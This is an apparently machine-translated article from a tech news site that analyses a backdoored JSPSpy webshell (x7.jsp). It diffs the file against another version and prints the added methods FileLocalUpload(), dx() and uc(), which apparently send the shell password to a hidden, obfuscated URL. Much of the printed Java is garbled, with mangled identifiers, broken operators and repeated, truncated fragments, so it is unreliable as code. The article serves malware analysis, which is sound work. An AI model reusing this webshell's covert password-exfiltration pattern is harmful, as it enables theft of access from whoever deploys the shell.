Shulou(Shulou.com)05/31 Report--

Follow me

At first glance, this is jspspy.

Young people, don't worry. Let's download the whole project first and then analyze it carefully. By comparing the file size between x7.jsp and the xia.jsp below, we find that x7.jsp has more 2kb than xia.jsp. It is known that xia.jsp is also a version of jspspy.

But when we open x7.jsp and xia.jsp respectively, we try to find out where there is more 2kb. As a beginner of java, we don't seem to have the ability to read through the code of each function module of jspspy. So we can compare the text content through the command that comes with windows (emmmm, similar to the diff command under linux).

Use pipe symbols to redirect the output of two different parts of the jsp to an txt document.

When we open txt, we start to analyze, and all of a sudden we find that there is a problem as follows.

Notice that another variable SXM value is defined in the code x7.jsp in line 23 of the txt document, which is the value of PW.

So let's start by focusing on what the newly defined sxm variable in x7.jsp is for.

Then use the editor to directly ctrl+f to find sxm in the current file

Go straight to line 854

It is found that three new methods (functions in C language) are uc (), dx (), and FileLocalUpload () to locate and view the code blocks of these three methods in turn.

FileLocalUpload () method

Public static String FileLocalUpload (String reqUrl,String fckal,String recvEncoding) {HttpURLConnection url_con = null; String responseContent = null; try {URL url = new URL (reqUrl); url_con = (HttpURLConnection) url.openConnection (); url_con.setRequestMethod ("POST"); url_con.setRequestProperty ("REFERER", "" + fckal+ "") System.setProperty ("sun.net.client.defaultConnectTimeout", String.valueOf (connectTimeOut)); System.setProperty ("sun.net.client.defaultReadTimeout", String.valueOf (readTimeOut)); url_con.setDoOutput (true); url_con.getOutputStream (). Flush (); url_con.getOutputStream (). Close () InputStream in = url_con.getInputStream (); BufferedReader rd = new BufferedReader (new InputStreamReader (in,recvEncoding)); String tempLine = rd.readLine (); StringBuffer tempStr = new StringBuffer (); String crlf=System.getProperty ("line.separator"); while (tempLine! = null) {tempStr.append (tempLine) TempStr.append (crlf); tempLine = rd.readLine ();} responseContent = tempStr.toString (); rd.close (); in.close () } catch (IOException e) {} finally {if (url_con! = null) {url_con.disconnect ();}} return responseContent;}

Dx () method

Public static String SysInfo= "=?. /.. /:"; public static String dx () {String s = new String (); for (int I = SysInfo.length ()-1; I > = 0; iMel -) {s + = SysInfo.charAt (I);} return s;}

Uc () method

Public static String uc (String str) {String c = "\ n\ r"; long dong127, feng11, juni12, hourly 14, massie 31, rhomb 83, karma 1, nylon 8, spore 114, upright Lue 5, vain 5 last axiom; StringBuffer sb = new StringBuffer (); char [] ch = str.toCharArray (); for (int I = 0; I

< ch.length; i++) { a = (int)ch[i]; if(a==d) a=13; if(a==f) a=10; if(a==j) a=34; if((a>

= h) & & (aqqk) & (aqq48) & & (a = 0; iMurb -) {s + = SysInfo.charAt (I);} return s;} public static String uc (String str) {String c = "\ n\ r" Long dong127, fau11, juni12, hog14, massif 31, rang 83, karma 1, naphtha 8, spore 114, upright UV 5, vain 5 dint 0; StringBuffer sb = new StringBuffer (); char [] ch = str.toCharArray (); for (int I = 0; I

< ch.length; i++) { a = (int)ch[i]; if(a==d) a=13; if(a==f) a=10; if(a==j) a=34; if((a>

= h) & (aqqk) & & (aqq53) & & (axi48) & & (a)

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.